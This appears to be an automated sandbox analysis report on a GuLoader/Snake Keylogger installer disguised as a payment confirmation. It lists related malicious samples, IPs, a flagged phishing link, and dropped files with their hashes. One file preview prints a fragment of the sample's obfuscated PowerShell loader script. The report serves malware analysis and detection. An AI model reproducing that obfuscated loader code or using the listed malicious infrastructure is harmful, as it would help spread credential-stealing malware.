	https://u45839844.ct.sendgrid.net/ls/click?upn=u001.DllELGnMN-2FgwhPuw-2Bw-2BNgnmCFrfnsrctB8UQDAzNXZjNxpXpR2XKCBH3KthzekeYjaQbAA5LVcSujhMLVBWSnb2uqKjideDrmtYjteyHbcY-3DVOSG_eH7kZOEBJckm0lbfavKeEjXQgDcXEoTs4hlXzovVib9ds-2F8T92pqONkaTjg8DIkzupCO8NGtXqlMZORh0VZrRebaYQDw-2F1cs5cZjQ3jKjnAbQSx6JHPZK1-2F-2Fim0iGhiJRpXS6CHLx2XY2QhyuOQPi1BQNckNSrlGnSo7tfNz-2FxLDU3SSyPj0JdUOc8e0dUZYwAsbzZEsHLw-2BsqGT9chBpfiKB7hSzPykCsWC3EnYNmGZXURKkY9cgFlX1wiFMuvEj1REXgr7jFKZfJeau8BuLIsBDEBB-2BSoYK-2BycEZ38w7bCu3IQro31ke-2FAq552arUSFCi2TKQJQbpRwV6wPpGIs8IoqSrpuMw1ckBevCdjFAGXvbVOwe-2B7ojm5NPUPfO28yeCN37VpJ6C-2Fy-2ByuFcAeHd0ltdClYFVsrlLry5vSoVoMBxOXyION2UWcfwbT1J08TpTRcrl2WJmakRx3o1eJ30Rj5nuZyBG3dTZU4osRARY4Ei-2Ba-2F78IkgHV6qqnFiCC00dgTWTaTSAFSz5SIHRu6ppjaFaGzM0I0-2FCIYXBT-2BRzqQZUh-2FAuxfn1vfL9Ofh8Ez-2Fh2cqCwHTWqaCiOUZX-2B7g-3D-3D#john@steinborn.com	Get hash	malicious	HTMLPhisher	Browse	192.185.193.215
	rRSFREVISEDINVOICE.exe	Get hash	malicious	GuLoader	Browse	69.49.244.149
	rRSFREVISEDINVOICE.exe	Get hash	malicious	GuLoader	Browse	69.49.244.149
	231210-01-AgentTesla-2eba02.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
ORACLE-BMC-31898US	counter.exe	Get hash	malicious	Bdaejec	Browse	158.101.87.161
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	LisectAVT_2403002A_276.exe	Get hash	malicious	Unknown	Browse	108.167.181.251
	LisectAVT_2403002A_270.exe	Get hash	malicious	BlackMoon	Browse	108.167.181.251
	tGnix5uKlr.exe	Get hash	malicious	Unknown	Browse	108.167.181.251
	LisectAVT_2403002A_187.exe	Get hash	malicious	CobaltStrike	Browse	108.167.181.251
	tGnix5uKlr.exe	Get hash	malicious	Unknown	Browse	108.167.181.251
	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	108.167.181.251
	FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe	Get hash	malicious	Bdaejec	Browse	108.167.181.251
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	108.167.181.251
	f84038a5c35557bb57839423dcab27287ac5ab490fca503f496df61da5e2bc99.exe	Get hash	malicious	Bdaejec, Vidar	Browse	108.167.181.251
	F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	108.167.181.251

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_15d6d0e0874d72d2fcd2c8c32686e616c5a2dc_9f72327e_a18ab8e7-2a27-4583-af50-06fda05251ea\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2016921897218664
Encrypted:	false
SSDEEP:	192:ZTsvhUtYaT0BU/gjC/h0lwrzuiFiZ24IO8o:Ns6tYaABU/gjHlwrzuiFiY4IO8o
MD5:	6A1F401239A7B8DD30CFADC1062F2119
SHA1:	5EED7AE339474C9E718116F4CADADA562D1D533E
SHA-256:	723BD91DAB97DE4E6F7C63913FC8CF00471CC4A3A90671230E36E9EEE95193C4
SHA-512:	F6754509250B60843667C4282D8AB58C643DF358DC26174180167C0A2F929D059625E1DF363A9D540C2B6C55FB3F62E3A015F4C1AF6554E965091BBE3096AA9F
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.5.0.4.2.2.9.6.7.7.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.5.0.4.2.4.2.3.3.3.2.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.8.a.b.8.e.7.-.2.a.2.7.-.4.5.8.3.-.a.f.5.0.-.0.6.f.d.a.0.5.2.5.1.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.7.0.c.d.3.9.-.a.6.f.b.-.4.d.2.c.-.9.c.0.f.-.d.7.5.0.c.2.2.6.8.e.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.a.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.4.-.0.0.0.1.-.0.0.1.4.-.9.4.5.3.-.c.c.b.2.3.f.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5987.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jul 25 03:07:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	298863
Entropy (8bit):	3.6357109706381503
Encrypted:	false
SSDEEP:	3072:Bn6UXCQmtf8iuHiICIw0c4uEq/yUIcCxLTgE:B6UXVkfluOj0c4OyUIcCNTg
MD5:	B2101E34A078619FD25978C561AF51B0
SHA1:	BE151FF6F592E0FF44B138A100CD21C288BAC019
SHA-256:	60D96721DE078527179A99A1F8766814B2A91E5BDB1548C4FB69419F769DD1E0
SHA-512:	AEBF7214E2AC8A896AF0F91C676D9BC7F214C742DB14058C2A9CB459069D60C6B0E091EFEC427DEA50ECF387DA12B888D3AC0B53223EB8785F34155C4A251047
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......W..f............t...........0"..\|.......T%..._..........T.......8...........T........... c..O,...........+...........-..............................................................................eJ......0.......GenuineIntel............T.......4...L..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D13.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8344
Entropy (8bit):	3.69643329883886
Encrypted:	false
SSDEEP:	192:R6l7wVeJnb6ii5L6Y6k6MgmfjP405prw89byCrsf0Vcwm:R6lXJb6iSL6YB6MgmfjP40pyCwfX1
MD5:	7BB8CD84289764D70BD139821D98BFA9
SHA1:	DF99971D9760D3E542CD09AE45D5B27D61560D4A
SHA-256:	42B0E8D2935602EF2CFFB0618F6BA24AF7C2F7EC70D02E800D6615A4275BD4AE
SHA-512:	9FBDEF40C120C4D921CBFA6B78ED1A4681AFCE67FB576EDB908E4EDD71529F42755F9771CC596F1A8CBF063CCB4B521BC87C271248BA304A3F2B8DB60125ABB4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D71.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4632
Entropy (8bit):	4.464671557215573
Encrypted:	false
SSDEEP:	48:cvIwWl8zsqJg77aI9EXWpW8VYbYm8M4JFjFA+q8zAj07I48d:uIjf4I7im7VDJwWk48d
MD5:	55C45A6450E12C68F05521688EBD6307
SHA1:	1107B9880B672E6E14875A42EA942ED8EB3507FC
SHA-256:	B4F74BA556DAAB00D6C5A3623DC338174555B91B98D77429A8A30162C128A160
SHA-512:	8FF7BE2437C65446F4D7E5774F2D241D3F29DBED51E1FB1A98F00F2F60270631B913BBDC8DB090E54AFF5438E58DD99064A2F73FE57871AB9D85088476192134
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425889" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrj1pcie.3uc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrvjjpg0.p3w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	868928
Entropy (8bit):	7.614986406787639
Encrypted:	false
SSDEEP:	24576:4YDoeMwkejuoLDfb8gN8R8IJhijTKDPBdKndU:jdMErLvvN8R/LmKDPBGU
MD5:	BAF114AC8DAB2634A6F9E33CC67C4B33
SHA1:	66DA72CA66C33A928A401D160875F82AF9F89BC0
SHA-256:	87AB493612C1A0F03673AC9592DF018F5F11F9222C03DD7D63B173D9DCCB0848
SHA-512:	728E01ECCC8355D1FE29DEDE7CACA34A1717511089E1369CB31A4E7E8CFC3A4533CA2FC95E964C4FE2230B73123AA28B6D7AACF7474F66FBB2A7820C57EB3D71
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@..........................................................................t...........Y...........*..(............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\ondskabsfuldhedernes.txt

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	ASCII text, with very long lines (367), with CRLF line terminators
Category:	modified
Size (bytes):	440
Entropy (8bit):	4.2802377004664205
Encrypted:	false
SSDEEP:	12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
MD5:	9524154CFD936F21394F74D000856732
SHA1:	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
SHA-256:	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
SHA-512:	4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
Malicious:	false
Preview:	habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Jordfyldens\lokalplanrammes.sus

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	data
Category:	dropped
Size (bytes):	221081
Entropy (8bit):	1.2406328235167285
Encrypted:	false
SSDEEP:	768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
MD5:	D0A61E12A7A27A4B719AB0C4B9F57B88
SHA1:	55A349C760BA7AF05C54934924E2C0289BB3FF24
SHA-256:	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
SHA-512:	3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
Malicious:	false
Preview:	.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	71792
Entropy (8bit):	5.2243799008382705
Encrypted:	false
SSDEEP:	1536:XWCyUe4+cfOXkak769Pgb6aE+aRxk5z35df7iMhY/FRBv:GCyUe4pfOXkJ+Kb6F+AAbLERBv
MD5:	AA4F469C337E81FDCD252F4E841CA7E5
SHA1:	65C8CA0311B68D764B0FAD3D6EA5061411818D12
SHA-256:	37AF5B072C0AF07340DA85766673FF77278951CD45A75E11B51208D83CF4E591
SHA-512:	0FC9FDDF6DE446281A0B504108DB3306CEDBA2F016289FB38EE10899F0C00CD8831C81E120C36BAA214672CBAE6B4E242E4650D52B3106C4F9D011D752E775D0
Malicious:	false
Preview:	$Discolouring=$Jerngittersengs;<#Ciffers Antitotalitarian Chola #><#Caveman Fantasteriernes Scleroskeleton Ombord Investion Lionship Brainier #><#Anthraconecrosis Draped Mbaya ijore farlighedens #><#Solvente Farveskalaerne Fiskefrikadellernes #><#Fantailed Spindeltrappes Geoemtry Tohjuledes Ponderousness #><#Zoologically Winkers Unlet Olieaffald Silenus nedslaget Veltalendes #>$Spillekants = "Nodic s;Tarr.rt`$ kli.ntM indhiuoWr,iversPanelizs TagryghVandfl,o Lo,tsbrUmagelinSelvbes=Taiwane`$ FornemFUref ekaI.lguidcHominise BefjeltSubs.metBarselseUncommenSvirpadsBombillePhenos p Stentolfremryka PleistnSuper,st AdsprenBau itsi Lepro.nOptjen,gArcograe Unquelr atticinPrealloe Ov.rspsTr,kkab;OverflsFTranquiuIndvindnBerammec FllesntCabbageiUnthinkoHaandkanAntiant CistedU Basunkd Ch rote matri.lTheezaneTronfralFjotte.ianstil gRadioece Sk,less sarkof Crypt.( Funkti`$sakskbiFAkkordeaPreinsuc semicueSacchartklittagtSlidstreB,rnebanUpwellasBlondinoSaltmanrProsopleHeteropmAetosa.aManualisIntellekM

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ungilled.Cad

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	data
Category:	dropped
Size (bytes):	333158
Entropy (8bit):	7.689371076680782
Encrypted:	false
SSDEEP:	6144:XL0p5fLZGP+G/nNj2eMyykfHsQUyKOJVznleICp4Pp/xWgx1H:XL0Df9O+A5bxf+yKObnkH0hH
MD5:	90DEE1AE90F5B4B7DF59B0A7B0F529C3
SHA1:	673B784036DED375DC2525F026E7E9B1C02D73A1
SHA-256:	C6D6966B18C7F00B542AE5FF5103D8487E2529715F5B0A6500EDE8806AE939CD
SHA-512:	CC1561583BC6F716CACBA2D595EBBFA8EDA0495C677E0EAF4E2E50626C23398DEB7428F31C2F46CC9C4B9B444AE78E1183066CC998B61689BA4E7D71E3B801BE
Malicious:	false
Preview:	.....111.@@........x........................hhhh.....&.............//...................'....&..................J..........yyy.....AAAAAAA...................5..ggggg.....gg........!......}........jj....[[[.......................................2.............""........NN...............BBBB.......q................\|\|.............................S......B..}.......[[.....u...........c.e..........aa.........d..................:.XX..................k...................t.......b............f...............MM..;...................................u.......GG...4444..................................###...N.......<.E.KK.......%..6......g....................}...........U...........JJJJ.n.....YY....[.......a........6.............&...........p............SS.........................9.777.............L......K..0.....P...>>>...-...W.G..w.........r...............SS.....;...........................rr.........................}.A.h.ZZ...pppp..................666......................i.RR...................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	data
Category:	dropped
Size (bytes):	629448
Entropy (8bit):	1.257234589035216
Encrypted:	false
SSDEEP:	1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
MD5:	B9E5947712FA407B58A8527B52CE050E
SHA1:	9FD16F2F3569FF478C591E16A03EF65F7D63E57E
SHA-256:	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
SHA-512:	BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
Malicious:	false
Preview:	....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................

C:\Users\user\AppData\Local\Temp\nshABD4.tmp

Download File

Process:	C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
File Type:	data
Category:	dropped
Size (bytes):	1265909
Entropy (8bit):	3.8593305691819975
Encrypted:	false
SSDEEP:	12288:dL0Df9O+A5bxf+yKObnkH0h96x1b6FlE5Cact5v:iBO+A59f+NO7a0+bp4v
MD5:	AB2E96D72C30FD165FC5224EDF7F7914
SHA1:	1EFDDE4B5BEB0DF8CAE0E89963B47BA9D0FDA9F4
SHA-256:	CF45128B9471DF424AF93918ED654A44522C3C4008E920DD0D1FF83FF8A9B16C
SHA-512:	659DD075214F84E576285A0FF7272A3B455C57F66B4D8529290BAFBF12345EA80DBE3D4946C0C56BB417BF6191AD04DB8CFDD4069C422F6571101C785C297E46
Malicious:	false
Preview:	.&......,...................V...,.......(&.......&........................................................................................................................................................................................................................................G...f...........o...j...............................................................................................................................v...............5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417304340567438
Encrypted:	false
SSDEEP:	6144:vcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuNW5+:Ui58NSWIZBk2MM6AFBoo
MD5:	E9E1B670A1033E46E8CFCCDCF641231A
SHA1:	A36CF8A6D26248717E3AD1AA0CA4DD2A194A4B84
SHA-256:	3B92BCB9C1A065133736825F9CDB5C904E2AE945918CF5EB9A6E4D982B02F693
SHA-512:	0F2CEBF09EEE22F7B973FCD42C25AAF0D2EC02F69CA3159474016B18409AC8122EF85C67F6AE036C3A4602F644873DF7AAE81F17840B39774F09999C9489B58C
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1..?...............................................................................................................................................................................................................................................................................................................................................3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.614986406787639
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Confirmation transfer Note AGS # 22-00379.exe
File size:	868'928 bytes
MD5:	baf114ac8dab2634a6f9e33cc67c4b33
SHA1:	66da72ca66c33a928a401d160875f82af9f89bc0
SHA256:	87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
SHA512:	728e01eccc8355d1fe29dede7caca34a1717511089e1369cb31a4e7e8cfc3a4533ca2fc95e964c4fe2230b73123aa28b6d7aacf7474f66fbb2a7820c57eb3d71
SSDEEP:	24576:4YDoeMwkejuoLDfb8gN8R8IJhijTKDPBdKndU:jdMErLvvN8R/LmKDPBGU
TLSH:	23050252B292E950D8494D741213D680CFB29D202E26DB4B37A8B76FDE377C1BF06356
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


